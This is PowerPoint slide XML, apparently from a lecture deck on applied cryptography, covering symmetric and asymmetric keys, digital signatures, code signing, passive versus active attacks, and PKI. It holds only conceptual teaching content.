              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" defTabSz="814388" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Symmetric key encrypted with asymmetric key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4572000"/>
            <a:ext cx="8305800" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Symmetric algorithms: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Creates sessions keys which encrypts bulk data (the message)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asymmetric algorithms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Use public and private keys for automated distribution of session keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 14" descr="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6150" y="2447925"/>
            <a:ext cx="471050" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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clear_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8204" y="2514600"/>
            <a:ext cx="590550" cy="71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1226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Digital Signatures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30753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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Services- Digital Signatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Content Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authenticates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> a source, proving a certain party has seen, and has signed, the data in question</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Signing party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot repudiate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> that it signed the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Guarantees that the data has not changed from the time it was signed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4646613" y="5272088"/>
            <a:ext cx="173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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authenticity </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84997" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7726363" y="5410200"/>
            <a:ext cx="1265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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integrity </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84998" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5880100" y="5791200"/>
            <a:ext cx="2151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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nonrepudiation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84999" name="Picture 26" descr="MCj042479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413" y="1766888"/>
            <a:ext cx="27051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WordArt 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6094413" y="3443288"/>
            <a:ext cx="990600" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" fromWordArt="1">
            <a:prstTxWarp prst="textPlain">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>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Digital </a:t>
            </a:r>
          </a:p>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Signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85001" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5561013" y="4205288"/>
            <a:ext cx="838200" cy="1143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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85002" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6704013" y="4205288"/>
            <a:ext cx="228600" cy="1524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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85003" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7008813" y="4205288"/>
            <a:ext cx="1295400" cy="1219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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28995663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9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Properties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Content Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455613" y="1690688"/>
            <a:ext cx="8307387" cy="4252912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>The signature is authentic and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>not forgeable:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> The signature is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>proof that the signer, and no one </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>else, signed the document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>The signature is not reusable:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>The signature is a part of the document and cannot be moved to a different document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>The signature is unalterable:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> After a document is signed, it cannot be altered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>The signature cannot be repudiated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>: For legal purposes, the signature and the document are considered to be physical things. The signer cannot claim later that they did not sign it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4903788" y="1371600"/>
            <a:ext cx="3935412" cy="1885950"/>
            <a:chOff x="3760787" y="2152650"/>
            <a:chExt cx="5230813" cy="3028950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="86021" name="Picture 14" descr="clear_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87" y="2457450"/>
              <a:ext cx="22209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15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1125519">
              <a:off x="7323292" y="4488725"/>
              <a:ext cx="1141412"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sp>
          <p:nvSpPr>
            <p:cNvPr id="86023" name="WordArt 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1044163">
              <a:off x="7318191" y="4523275"/>
              <a:ext cx="1116013" cy="265113"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>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Signature</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86024" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6389687" y="3524250"/>
              <a:ext cx="68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90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86025" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6389687" y="3676650"/>
              <a:ext cx="68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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3000" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="86026" name="Picture 25" descr="MCj042479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0787" y="2152650"/>
              <a:ext cx="27051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7" name="WordArt 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5322887" y="3829050"/>
              <a:ext cx="990600" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>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Digital </a:t>
              </a:r>
            </a:p>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Signature</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86028" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1125519">
              <a:off x="7306400" y="3011010"/>
              <a:ext cx="1141412" cy="4130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sp>
          <p:nvSpPr>
            <p:cNvPr id="86029" name="WordArt 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1044163">
              <a:off x="7318191" y="3075475"/>
              <a:ext cx="1116013" cy="265113"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" kern="10">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Brush Script MT"/>
                </a:rPr>
                <a:t>Memo</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1286679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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Code Signing with Digital Signatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4648200"/>
            <a:ext cx="8224838" cy="1524000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="508000" lvl="1" indent="-287338" defTabSz="508000">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>The publisher of the software attaches a digital signature to the executable, signed with the signature key of the publisher.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="508000" lvl="1" indent="-287338" defTabSz="508000">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>The user of the software needs to obtain the public key of the publisher or the CA certificate of the publisher if PKI is used.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8806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676400"/>
            <a:ext cx="3877654"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3919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Messages with RSA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensures authenticity and integrity of messages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98004"/>
            <a:ext cx="7772400" cy="417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232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Applying Cryptography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9293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Categories of Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141"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Passive Attack </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Difficult to detect, because the attacker isn’t actively sending traffic (malicious or otherwise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-28548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Example: An attacker capturing packets from the network and attempting to decrypt them</a:t>
            </a:r>
          </a:p>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Active Attack </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Easier to detect, because the attacker is actively sending traffic that can be detected. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-28548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An attacker might launch an active attack in an attempt to access classified information or to modify data on a system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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Public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" smtClean="0"/>
              <a:t>Secure Socket Layer (SSL) and Transport Layer Security (TLS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0" smtClean="0"/>
              <a:t>Email Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" noProof="1" smtClean="0"/>
              <a:t>Disk Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17413288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spect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PKI Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94211" name="Picture 6"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141538"/>
            <a:ext cx="9144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7" descr="Govern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513" y="1752600"/>
            <a:ext cx="1919287"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8" descr="Small_Busin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4457700"/>
            <a:ext cx="15240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Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
